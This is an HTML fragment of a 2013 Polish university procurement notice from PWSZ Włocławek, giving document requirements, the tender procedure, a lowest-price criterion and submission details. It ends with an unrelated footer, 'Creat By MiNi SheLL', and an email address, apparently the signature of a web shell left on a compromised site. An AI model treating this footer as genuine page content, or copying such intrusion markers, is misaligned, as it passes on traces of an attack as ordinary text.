<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwsz.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego przy ul. 3 Maja 17 we Włocławku, pok. 32.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2013 godzina 12:45, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego: Państwowa Wyższa Szkoła Zawodowa we Włocławku, ul. 3 Maja 17, 87-800 Włocławek, Kancelaria Uczelni - I piętro, pok. 16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com